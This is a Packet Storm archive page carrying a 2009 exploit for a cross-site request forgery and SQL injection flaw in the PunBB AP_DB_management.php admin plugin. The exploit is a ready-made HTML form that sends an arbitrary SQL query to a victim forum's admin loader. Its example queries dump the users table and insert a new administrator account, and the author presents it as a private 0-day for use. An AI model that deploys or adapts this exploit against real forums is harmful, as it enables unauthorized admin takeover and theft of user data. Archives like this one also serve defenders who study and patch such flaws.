what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

PunBB AP_DB_management.php SQL Injection

PunBB AP_DB_management.php SQL Injection
Posted Jun 29, 2009
Authored by Dante90 | Site warwolfz.org

PunBB suffers from a remote SQL injection vulnerability when leveraging a cross site request forgery vulnerability in AP_DB_management.php.

tags | exploit, remote, php, sql injection, csrf
SHA-256 | 5af98f2038d18971688979435e4efa2008d7b0edf2049ff2935b7f174f41d684

PunBB AP_DB_management.php SQL Injection

Change Mirror Download
######################################################################################
#
#
# Author: Dante90, WaRWolFz
Crew #
# Title: PunBB (AP_DB_management.php) Remote SQL Injection CSRF By Dante90
[0-Day] #
# MSN: dante90.dmc4@hotmail.it
#
# Web: www.warwolfz.org
#
#
#
######################################################################################

[0-Day & Priv8] PunBB Administration Plug-In (AP_DB_management.php) Remote
SQL Injection CSRF Exploit By Dante90

[code]

<html>
<head>
<title>[0-Day & Priv8] PunBB Administration Plug-In
(AP_DB_management.php) Remote SQL Injection CSRF Exploit By Dante90</title>
</head>
<body>
<center><fieldset>
<legend>Run SQL query</legend>
<form name="Dante90" method="post" action="
http://www.victime_site.org/PunBB/admin_loader.php?plugin=AP_DB_management.php
">
<textarea name="this_query" rows="5" cols="50">

[SQL_Injection]

</textarea>
<input type="submit" name="submit" value="Run query" />
</form>
</fieldset></center>
</body>
</html>

[/code]

[SQL_Injection] = Insert the SQL Injection

Example of SQL Injection:

[code]
SELECT * FROM users WHERE id=2;

SELECT * FROM users WHERE group_id=1;

INSERT INTO users (group_id, username, password, email, num_posts,
registration_ip, last_visit) VALUES(1, '[NICK_NEW_ADMIN]',
'md5("[PASSWORD_NEW_ADMIN]")', '[E-MAIL_NEW_ADMIN]', 1, '127.0.0.1',
'1220984516');
[/code]

[NICK_NEW_ADMIN] = New Administrator's Nick

[PASSWORD_NEW_ADMIN] = New Administrator's Password

[E-MAIL_NEW_ADMIN] = New Administrator's E-Mail


Dante90
Login or Register to add favorites

File Archive:

February 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Feb 1st
    16 Files
  • 2
    Feb 2nd
    19 Files
  • 3
    Feb 3rd
    0 Files
  • 4
    Feb 4th
    0 Files
  • 5
    Feb 5th
    24 Files
  • 6
    Feb 6th
    2 Files
  • 7
    Feb 7th
    10 Files
  • 8
    Feb 8th
    25 Files
  • 9
    Feb 9th
    37 Files
  • 10
    Feb 10th
    0 Files
  • 11
    Feb 11th
    0 Files
  • 12
    Feb 12th
    17 Files
  • 13
    Feb 13th
    20 Files
  • 14
    Feb 14th
    25 Files
  • 15
    Feb 15th
    15 Files
  • 16
    Feb 16th
    6 Files
  • 17
    Feb 17th
    0 Files
  • 18
    Feb 18th
    0 Files
  • 19
    Feb 19th
    35 Files
  • 20
    Feb 20th
    25 Files
  • 21
    Feb 21st
    18 Files
  • 22
    Feb 22nd
    15 Files
  • 23
    Feb 23rd
    0 Files
  • 24
    Feb 24th
    10 Files
  • 25
    Feb 25th
    0 Files
  • 26
    Feb 26th
    37 Files
  • 27
    Feb 27th
    0 Files
  • 28
    Feb 28th
    0 Files
  • 29
    Feb 29th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close